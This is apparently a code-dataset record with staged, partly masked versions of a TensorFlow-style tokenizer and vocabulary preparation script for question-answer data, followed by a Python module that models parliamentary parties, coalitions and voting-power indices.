basic_tokenizer(sentence):\n \"\"\"Very basic tokenizer: split the sentence into a list of tokens.\"\"\"\n words = []\n for space_separated_fragment in sentence.strip().split():\n words.extend(_WORD_SPLIT.split(space_separated_fragment))\n return [w for w in words if w]\n\n\ndef create_vocabulary(vocabulary_path, json_vocab_path):\n \"\"\"Create vocabulary file (if it does not exist yet) from data file.\n\n Data file is assumed to contain one sentence per line. 
Each sentence is\n tokenized and digits are normalized (if normalize_digits is set).\n Vocabulary contains the most-frequent tokens up to max_vocabulary_size.\n We write it to vocabulary_path in a one-token-per-line format, so that later\n token in the first line gets id=0, second line gets id=1, and so on.\n\n Args:\n vocabulary_path: path where the vocabulary will be created.\n json_vocab_path: data file that will be used to create vocabulary.\n \"\"\"\n if not gfile.Exists(vocabulary_path):\n print('Transform vocabulary to %s' % vocabulary_path)\n with gfile.GFile(json_vocab_path, mode='rb') as f:\n jvocab = json.load(f)\n vocab = jvocab['w2id']\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get)\n with gfile.GFile(vocabulary_path, mode='wb') as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + b'\\n')\n\n\ndef initialize_vocabulary(vocabulary_path):\n \"\"\"Initialize vocabulary from file.\n\n We assume the vocabulary is stored one-item-per-line, so a file:\n dog\n cat\n will result in a vocabulary {\"dog\": 0, \"cat\": 1}, and this function will\n also return the reversed-vocabulary [\"dog\", \"cat\"].\n\n Args:\n vocabulary_path: path to the file containing the vocabulary.\n\n Returns:\n a pair: the vocabulary (a dictionary mapping string to integers), and\n the reversed vocabulary (a list, which reverses the vocabulary mapping).\n\n Raises:\n ValueError: if the provided vocabulary_path does not exist.\n \"\"\"\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode='rb') as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for y, x in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError('Vocabulary file %s not found.', vocabulary_path)\n\n\ndef sentence_to_token_ids(sentence, vocabulary):\n \"\"\"Convert a string to list of integers representing token-ids.\n\n For example, a sentence \"I have a dog\" may become tokenized into\n [\"I\", \"have\", \"a\", \"dog\"] and with vocabulary {\"I\": 1, \"have\": 2,\n \"a\": 4, \"dog\": 7\"} this function will return [1, 2, 4, 7].\n\n Args:\n sentence: the sentence in bytes format to convert to token-ids.\n vocabulary: a dictionary mapping tokens to integers.\n\n Returns:\n a list of integers, the token-ids for the sentence.\n \"\"\"\n return [vocabulary.get(w, UNK_ID) for w in sentence.strip().split()]\n\n\ndef data_to_token_ids(data_path, target_path, vocabulary_path):\n \"\"\"Tokenize data file and turn into token-ids using given vocabulary file.\n\n This function loads data line-by-line from data_path, calls the above\n sentence_to_token_ids, and saves the result to target_path. 
See comment\n for sentence_to_token_ids on the details of token-ids format.\n\n Args:\n data_path: path to the data file in one-sentence-per-line format.\n target_path: path where the file with token-ids will be created.\n vocabulary_path: path to the vocabulary file.\n \"\"\"\n if not gfile.Exists(target_path):\n print('Tokenizing data in %s' % data_path)\n vocab, _ = initialize_vocabulary(vocabulary_path)\n with gfile.GFile(data_path, mode='rb') as data_file:\n with gfile.GFile(target_path, mode='w') as tokens_file:\n counter = 0\n for line in data_file:\n counter += 1\n if counter % 100000 == 0:\n print(' tokenizing line %d' % counter)\n token_ids = sentence_to_token_ids(tf.compat.as_bytes(\n line), vocab)\n tokens_file.write(' '.join([str(tok) for tok in\n token_ids]) + '\\n')\n\n\ndef prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file\n ):\n \"\"\"Get WMT data into data_dir, create vocabularies and tokenize data.\n\n Args:\n data_dir: directory in which the data sets will be stored.\n train_data_file: jsonl data file.\n dev_data_file: jsonl data file.\n vocab_file: bpe json vocab\n\n Returns:\n A tuple of 6 elements:\n (1) path to the token-ids for src training data-set,\n (2) path to the token-ids for target training data-set,\n (3) path to the token-ids for src development data-set,\n (4) path to the token-ids for src development data-set,\n (5) path to the src vocabulary file,\n (6) path to the src vocabulary file.\n \"\"\"\n if not gfile.Exists(data_dir):\n gfile.MkDir(data_dir)\n train_path = get_qa_set(data_dir, train_data_file)\n dev_path = get_qa_set(data_dir, dev_data_file)\n vocab_path = os.path.join(data_dir, 'vocab.txt')\n create_vocabulary(vocab_path, vocab_file)\n src_train_ids_path = train_path + '.src.ids'\n targ_train_ids_path = train_path + '.targ.ids'\n data_to_token_ids(train_path + '.src', src_train_ids_path, vocab_path)\n data_to_token_ids(train_path + '.targ', targ_train_ids_path, vocab_path)\n src_dev_ids_path = dev_path + '.src.ids'\n targ_dev_ids_path = dev_path + '.targ.ids'\n data_to_token_ids(dev_path + '.src', src_dev_ids_path, vocab_path)\n data_to_token_ids(dev_path + '.targ', targ_dev_ids_path, vocab_path)\n return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path,\n targ_dev_ids_path, vocab_path)\n", "step-4": "<mask token>\n_PAD = b'_PAD'\n_GO = b'_GO'\n_EOS = b'_EOS'\n_UNK = b'_UNK'\n_START_VOCAB = [_PAD, _GO, _EOS, _UNK]\nPAD_ID = 0\nGO_ID = 1\nEOS_ID = 2\nUNK_ID = 3\n_WORD_SPLIT = re.compile(b'([.,!?\"\\':;)(])')\n_DIGIT_RE = re.compile(b'\\\\d')\n\n\ndef get_qa_set(directory, jsonl_file):\n \"\"\"Download the WMT en-fr training corpus to directory unless it's there.\"\"\"\n set_name = os.path.splitext(os.path.basename(jsonl_file))[0]\n set_path = os.path.join(directory, set_name)\n src_path = set_path + '.src'\n targ_path = set_path + '.targ'\n if gfile.Exists(src_path) and gfile.Exists(targ_path):\n return set_path\n with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(\n targ_path, 'w') as targfile:\n for line in qafile:\n lcontent = json.loads(line)\n srcfile.write(lcontent['q'].replace('\\n', '') + '\\n')\n targfile.write(lcontent['a'].replace('\\n', '') + '\\n')\n return set_path\n\n\ndef basic_tokenizer(sentence):\n \"\"\"Very basic tokenizer: split the sentence into a list of tokens.\"\"\"\n words = []\n for space_separated_fragment in sentence.strip().split():\n words.extend(_WORD_SPLIT.split(space_separated_fragment))\n return [w for w in words if w]\n\n\ndef 
create_vocabulary(vocabulary_path, json_vocab_path):\n \"\"\"Create vocabulary file (if it does not exist yet) from data file.\n\n Data file is assumed to contain one sentence per line. Each sentence is\n tokenized and digits are normalized (if normalize_digits is set).\n Vocabulary contains the most-frequent tokens up to max_vocabulary_size.\n We write it to vocabulary_path in a one-token-per-line format, so that later\n token in the first line gets id=0, second line gets id=1, and so on.\n\n Args:\n vocabulary_path: path where the vocabulary will be created.\n json_vocab_path: data file that will be used to create vocabulary.\n \"\"\"\n if not gfile.Exists(vocabulary_path):\n print('Transform vocabulary to %s' % vocabulary_path)\n with gfile.GFile(json_vocab_path, mode='rb') as f:\n jvocab = json.load(f)\n vocab = jvocab['w2id']\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get)\n with gfile.GFile(vocabulary_path, mode='wb') as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + b'\\n')\n\n\ndef initialize_vocabulary(vocabulary_path):\n \"\"\"Initialize vocabulary from file.\n\n We assume the vocabulary is stored one-item-per-line, so a file:\n dog\n cat\n will result in a vocabulary {\"dog\": 0, \"cat\": 1}, and this function will\n also return the reversed-vocabulary [\"dog\", \"cat\"].\n\n Args:\n vocabulary_path: path to the file containing the vocabulary.\n\n Returns:\n a pair: the vocabulary (a dictionary mapping string to integers), and\n the reversed vocabulary (a list, which reverses the vocabulary mapping).\n\n Raises:\n ValueError: if the provided vocabulary_path does not exist.\n \"\"\"\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode='rb') as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for y, x in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError('Vocabulary file %s not found.', vocabulary_path)\n\n\ndef sentence_to_token_ids(sentence, vocabulary):\n \"\"\"Convert a string to list of integers representing token-ids.\n\n For example, a sentence \"I have a dog\" may become tokenized into\n [\"I\", \"have\", \"a\", \"dog\"] and with vocabulary {\"I\": 1, \"have\": 2,\n \"a\": 4, \"dog\": 7\"} this function will return [1, 2, 4, 7].\n\n Args:\n sentence: the sentence in bytes format to convert to token-ids.\n vocabulary: a dictionary mapping tokens to integers.\n\n Returns:\n a list of integers, the token-ids for the sentence.\n \"\"\"\n return [vocabulary.get(w, UNK_ID) for w in sentence.strip().split()]\n\n\ndef data_to_token_ids(data_path, target_path, vocabulary_path):\n \"\"\"Tokenize data file and turn into token-ids using given vocabulary file.\n\n This function loads data line-by-line from data_path, calls the above\n sentence_to_token_ids, and saves the result to target_path. 
See comment\n for sentence_to_token_ids on the details of token-ids format.\n\n Args:\n data_path: path to the data file in one-sentence-per-line format.\n target_path: path where the file with token-ids will be created.\n vocabulary_path: path to the vocabulary file.\n \"\"\"\n if not gfile.Exists(target_path):\n print('Tokenizing data in %s' % data_path)\n vocab, _ = initialize_vocabulary(vocabulary_path)\n with gfile.GFile(data_path, mode='rb') as data_file:\n with gfile.GFile(target_path, mode='w') as tokens_file:\n counter = 0\n for line in data_file:\n counter += 1\n if counter % 100000 == 0:\n print(' tokenizing line %d' % counter)\n token_ids = sentence_to_token_ids(tf.compat.as_bytes(\n line), vocab)\n tokens_file.write(' '.join([str(tok) for tok in\n token_ids]) + '\\n')\n\n\ndef prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file\n ):\n \"\"\"Get WMT data into data_dir, create vocabularies and tokenize data.\n\n Args:\n data_dir: directory in which the data sets will be stored.\n train_data_file: jsonl data file.\n dev_data_file: jsonl data file.\n vocab_file: bpe json vocab\n\n Returns:\n A tuple of 6 elements:\n (1) path to the token-ids for src training data-set,\n (2) path to the token-ids for target training data-set,\n (3) path to the token-ids for src development data-set,\n (4) path to the token-ids for src development data-set,\n (5) path to the src vocabulary file,\n (6) path to the src vocabulary file.\n \"\"\"\n if not gfile.Exists(data_dir):\n gfile.MkDir(data_dir)\n train_path = get_qa_set(data_dir, train_data_file)\n dev_path = get_qa_set(data_dir, dev_data_file)\n vocab_path = os.path.join(data_dir, 'vocab.txt')\n create_vocabulary(vocab_path, vocab_file)\n src_train_ids_path = train_path + '.src.ids'\n targ_train_ids_path = train_path + '.targ.ids'\n data_to_token_ids(train_path + '.src', src_train_ids_path, vocab_path)\n data_to_token_ids(train_path + '.targ', targ_train_ids_path, vocab_path)\n src_dev_ids_path = dev_path + '.src.ids'\n targ_dev_ids_path = dev_path + '.targ.ids'\n data_to_token_ids(dev_path + '.src', src_dev_ids_path, vocab_path)\n data_to_token_ids(dev_path + '.targ', targ_dev_ids_path, vocab_path)\n return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path,\n targ_dev_ids_path, vocab_path)\n", "step-5": "# Copyright 2015 The TensorFlow Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport re\nimport json\n\nfrom tensorflow.python.platform import gfile\nimport tensorflow as tf\n\n# Special vocabulary symbols - we always put them at the start.\n_PAD = b\"_PAD\"\n_GO = b\"_GO\"\n_EOS = b\"_EOS\"\n_UNK = b\"_UNK\"\n_START_VOCAB = [_PAD, _GO, _EOS, _UNK]\n\nPAD_ID = 0\nGO_ID = 1\nEOS_ID = 2\nUNK_ID = 3\n\n# Regular expressions used to tokenize.\n_WORD_SPLIT = re.compile(b\"([.,!?\\\"':;)(])\")\n_DIGIT_RE = re.compile(br\"\\d\")\n\n\ndef get_qa_set(directory, jsonl_file):\n \"\"\"Download the WMT en-fr training corpus to directory unless it's there.\"\"\"\n set_name = os.path.splitext(os.path.basename(jsonl_file))[0]\n set_path = os.path.join(directory, set_name)\n src_path = set_path + '.src'\n targ_path = set_path + '.targ'\n if gfile.Exists(src_path) and gfile.Exists(targ_path):\n return set_path\n with open(jsonl_file, 'r') as qafile, open(src_path,'w') as srcfile, open(targ_path,'w') as targfile:\n for line in qafile:\n lcontent = json.loads(line)\n srcfile.write(lcontent['q'].replace('\\n', '') + '\\n')\n targfile.write(lcontent['a'].replace('\\n', '') + '\\n')\n return set_path\n\n\ndef basic_tokenizer(sentence):\n \"\"\"Very basic tokenizer: split the sentence into a list of tokens.\"\"\"\n words = []\n for space_separated_fragment in sentence.strip().split():\n words.extend(_WORD_SPLIT.split(space_separated_fragment))\n return [w for w in words if w]\n\n\ndef create_vocabulary(vocabulary_path, json_vocab_path):\n \"\"\"Create vocabulary file (if it does not exist yet) from data file.\n\n Data file is assumed to contain one sentence per line. 
Each sentence is\n tokenized and digits are normalized (if normalize_digits is set).\n Vocabulary contains the most-frequent tokens up to max_vocabulary_size.\n We write it to vocabulary_path in a one-token-per-line format, so that later\n token in the first line gets id=0, second line gets id=1, and so on.\n\n Args:\n vocabulary_path: path where the vocabulary will be created.\n json_vocab_path: data file that will be used to create vocabulary.\n \"\"\"\n if not gfile.Exists(vocabulary_path):\n print(\"Transform vocabulary to %s\" % vocabulary_path)\n with gfile.GFile(json_vocab_path, mode=\"rb\") as f:\n jvocab = json.load(f)\n vocab = jvocab['w2id']\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get)\n with gfile.GFile(vocabulary_path, mode=\"wb\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + b\"\\n\")\n\n\ndef initialize_vocabulary(vocabulary_path):\n \"\"\"Initialize vocabulary from file.\n\n We assume the vocabulary is stored one-item-per-line, so a file:\n dog\n cat\n will result in a vocabulary {\"dog\": 0, \"cat\": 1}, and this function will\n also return the reversed-vocabulary [\"dog\", \"cat\"].\n\n Args:\n vocabulary_path: path to the file containing the vocabulary.\n\n Returns:\n a pair: the vocabulary (a dictionary mapping string to integers), and\n the reversed vocabulary (a list, which reverses the vocabulary mapping).\n\n Raises:\n ValueError: if the provided vocabulary_path does not exist.\n \"\"\"\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)\n\n\ndef sentence_to_token_ids(sentence, vocabulary):\n \"\"\"Convert a string to list of integers representing token-ids.\n\n For example, a sentence \"I have a dog\" may become tokenized into\n [\"I\", \"have\", \"a\", \"dog\"] and with vocabulary {\"I\": 1, \"have\": 2,\n \"a\": 4, \"dog\": 7\"} this function will return [1, 2, 4, 7].\n\n Args:\n sentence: the sentence in bytes format to convert to token-ids.\n vocabulary: a dictionary mapping tokens to integers.\n\n Returns:\n a list of integers, the token-ids for the sentence.\n \"\"\"\n return [vocabulary.get(w, UNK_ID) for w in sentence.strip().split()]\n\n\ndef data_to_token_ids(data_path, target_path, vocabulary_path):\n \"\"\"Tokenize data file and turn into token-ids using given vocabulary file.\n\n This function loads data line-by-line from data_path, calls the above\n sentence_to_token_ids, and saves the result to target_path. 
See comment\n for sentence_to_token_ids on the details of token-ids format.\n\n Args:\n data_path: path to the data file in one-sentence-per-line format.\n target_path: path where the file with token-ids will be created.\n vocabulary_path: path to the vocabulary file.\n \"\"\"\n if not gfile.Exists(target_path):\n print(\"Tokenizing data in %s\" % data_path)\n vocab, _ = initialize_vocabulary(vocabulary_path)\n with gfile.GFile(data_path, mode=\"rb\") as data_file:\n with gfile.GFile(target_path, mode=\"w\") as tokens_file:\n counter = 0\n for line in data_file:\n counter += 1\n if counter % 100000 == 0:\n print(\" tokenizing line %d\" % counter)\n token_ids = sentence_to_token_ids(tf.compat.as_bytes(line), vocab)\n tokens_file.write(\" \".join([str(tok) for tok in token_ids]) + \"\\n\")\n\n\ndef prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file):\n \"\"\"Get WMT data into data_dir, create vocabularies and tokenize data.\n\n Args:\n data_dir: directory in which the data sets will be stored.\n train_data_file: jsonl data file.\n dev_data_file: jsonl data file.\n vocab_file: bpe json vocab\n\n Returns:\n A tuple of 6 elements:\n (1) path to the token-ids for src training data-set,\n (2) path to the token-ids for target training data-set,\n (3) path to the token-ids for src development data-set,\n (4) path to the token-ids for src development data-set,\n (5) path to the src vocabulary file,\n (6) path to the src vocabulary file.\n \"\"\"\n if not gfile.Exists(data_dir):\n gfile.MkDir(data_dir)\n\n # Get wmt data to the specified directory.\n train_path = get_qa_set(data_dir, train_data_file)\n dev_path = get_qa_set(data_dir, dev_data_file)\n\n # Create vocabularies of the appropriate sizes.\n vocab_path = os.path.join(data_dir, \"vocab.txt\")\n create_vocabulary(vocab_path, vocab_file)\n\n # Create token ids for the training data.\n src_train_ids_path = train_path + \".src.ids\"\n targ_train_ids_path = train_path + \".targ.ids\"\n data_to_token_ids(train_path + \".src\", src_train_ids_path, vocab_path)\n data_to_token_ids(train_path + \".targ\", targ_train_ids_path, vocab_path)\n\n # Create token ids for the development data.\n src_dev_ids_path = dev_path + \".src.ids\"\n targ_dev_ids_path = dev_path + \".targ.ids\"\n data_to_token_ids(dev_path + \".src\", src_dev_ids_path, vocab_path)\n data_to_token_ids(dev_path + \".targ\", targ_dev_ids_path, vocab_path)\n\n return (src_train_ids_path, targ_train_ids_path,\n src_dev_ids_path, targ_dev_ids_path,\n vocab_path)\n", "step-ids": [ 2, 3, 7, 8, 10 ] }
[ 2, 3, 7, 8, 10 ]
import collections
import itertools

from . import stats

__all__ = [
    'Party',
    'HoR',
    'Coalition'
]

Party = collections.namedtuple('Party', 'name,votes,seats')


class HoR(object):
    """House of Representatives"""

    def __init__(self, parties, name='HoR'):
        self.name = name
        # Largest party first: sort by seats, then votes, descending.
        self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.votes), reverse=True))
        self._party_mapping = {p.name: p for p in self._parties}

    def __getitem__(self, item):
        return self._party_mapping[item]

    @property
    def parties(self):
        return self._parties

    def seats_list(self):
        return [p.seats for p in self._parties]

    def votes_list(self):
        return [p.votes for p in self._parties]

    def names_list(self):
        return [p.name for p in self._parties]

    def vote_shares_list(self):
        v = self.votes
        return [vi / v for vi in self.votes_list()]

    def seat_shares_list(self):
        s = self.seats
        return [si / s for si in self.seats_list()]

    @property
    def seats(self):
        return sum(self.seats_list())

    @property
    def votes(self):
        return sum(self.votes_list())

    def top(self, n=1):
        return Coalition(self, self._parties[:n])

    def as_coalition(self):
        return Coalition(self, self._parties)

    def __contains__(self, item):
        return item in self._parties

    def __iter__(self):
        return iter(self._parties)

    def iter_coalitions(self):
        for n in range(1, len(self)):
            for coalition in itertools.combinations(self._parties, n):
                yield Coalition(self, coalition)

    def __len__(self):
        return len(self._parties)

    def __hash__(self):
        return hash(self._parties)

    def same_as(self, hor):
        return self.parties == hor.parties

    # Comparisons are by total seats, so a coalition can be weighed directly
    # against its opposition.
    def __eq__(self, other):
        return self.seats == other.seats

    def __gt__(self, other):
        return self.seats > other.seats

    def __ge__(self, other):
        return self.seats >= other.seats

    def __le__(self, other):
        return self.seats <= other.seats

    def __lt__(self, other):
        return self.seats < other.seats

    haar = stats.haar
    dev = stats.dev
    ens = stats.ens
    env = stats.env
    rrp = stats.rrp
    bantsaf_influence = stats.bantsaf_influence
    shepli_shubic = stats.shepli_shubic
    jonson_general = stats.jonson_general
    jonson_influence = stats.jonson_influence
    digen_pakel_general = stats.digen_pakel_general
    digen_pakel_influence = stats.digen_pakel_influence
    holer_pakel = stats.holer_pakel
    describe = stats.describe

    def map_stat(self, stat):
        # 'seats'/'votes' are read straight off the Party tuples.
        if stat in ('seats', 'votes'):
            return {party.name: getattr(party, stat) for party in self._parties}
        # Influence indices may be passed as the stats functions themselves...
        elif stat in (
            stats.bantsaf_influence,
            stats.shepli_shubic,
            stats.jonson_general,
            stats.jonson_influence,
            stats.digen_pakel_general,
            stats.digen_pakel_influence,
            stats.holer_pakel,
        ):
            return {party.name: stat(self, party) for party in self._parties}
        # ...or by name; anything else is not a per-party stat.
        elif stat not in (
            'bantsaf_influence',
            'shepli_shubic',
            'jonson_general',
            'jonson_influence',
            'digen_pakel_general',
            'digen_pakel_influence',
            'holer_pakel',
        ):
            raise ValueError('Stat {} cannot be computed'.format(stat))
        return {party.name: getattr(self, stat)(party) for party in self._parties}


class Coalition(HoR):
    def __init__(self, hor, parties, name='Coalition', *, _opposition=None):
        super().__init__(parties, name=name)
        self._hor = hor
        self._opposition = _opposition

    @property
    def opposition(self):
        if self._opposition is None:
            others = [p for p in self._hor if p not in self]
            self._opposition = Coalition(self._hor, others, _opposition=self)
        return self._opposition

    @property
    def hor(self):
        return self._hor

    def __add__(self, other):
        if isinstance(other, Party):
            if other in self:
                raise ValueError('{} is already present in HoR'.format(other))
            new = self._parties + (other,)
        elif isinstance(other, Coalition) and other.hor.same_as(self.hor):
            intercept = set(other) & set(self._parties)
            if intercept:
                raise ValueError('{} are already present in HoR'.format(intercept))
            new = self._parties + tuple(other)
        else:
            raise TypeError('Wrong type for {}'.format(other))
        return self.__class__(self.hor, new)

    def __sub__(self, other):
        if isinstance(other, Party):
            if other not in self:
                raise ValueError('{} is not present in HoR'.format(other))
            new = set(self._parties) - {other}
        elif isinstance(other, Coalition) and other.hor.same_as(self.hor):
            intercept = set(other) & set(self._parties)
            if not intercept:
                # No overlap at all: name the absent parties rather than the
                # (empty) intersection in the error message.
                raise ValueError('{} are not present in HoR'.format(set(other.parties)))
            new = set(self._parties) - set(other.parties)
        else:
            raise TypeError('Wrong type for {}'.format(other))
        return self.__class__(self.hor, new)

    def has_key_party(self, party):
        if party not in self:
            return False
        else:
            # A key party: the coalition wins, but handing the party to the
            # opposition would cost it the majority.
            opposition = self.opposition
            return (
                (self > opposition) and
                ((self - party) <= (opposition + party))
            )

    def key_parties(self):
        return list(filter(self.has_key_party, self.parties))

    def is_minimum_winning(self):
        return all(map(self.has_key_party, self.parties))
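A minimal usage sketch for the classes above, not part of the dataset record: the parties are invented, and it assumes the sibling stats module imports cleanly, since HoR binds its index methods at class-creation time.

# Hypothetical parliament; all names and numbers are made up.
parties = [
    Party(name='Alpha', votes=5000000, seats=180),
    Party(name='Beta', votes=3000000, seats=130),
    Party(name='Gamma', votes=1000000, seats=40),
]
hor = HoR(parties)

ruling = hor.top(2)                           # coalition of the two largest parties
print(ruling.seats, ruling.opposition.seats)  # 310 40
print(ruling.key_parties())       # parties whose defection would flip the majority
print(ruling.is_minimum_winning())  # True only if every member is a key party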
normal
{ "blob_id": "4c927f14065d0557dbe7b371002e133c351d3478", "index": 6933, "step-1": "<mask token>\n\n\nclass HoR(object):\n <mask token>\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.\n votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [(vi / v) for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [(si / s) for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n <mask token>\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n <mask token>\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Coalition(HoR):\n\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other,)\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(\n intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def 
has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return self > opposition and self - party <= opposition + party\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n", "step-2": "<mask token>\n\n\nclass HoR(object):\n <mask token>\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.\n votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [(vi / v) for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [(si / s) for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n <mask token>\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n\n def __hash__(self):\n return hash(self._parties)\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Coalition(HoR):\n\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other,)\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(\n intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and 
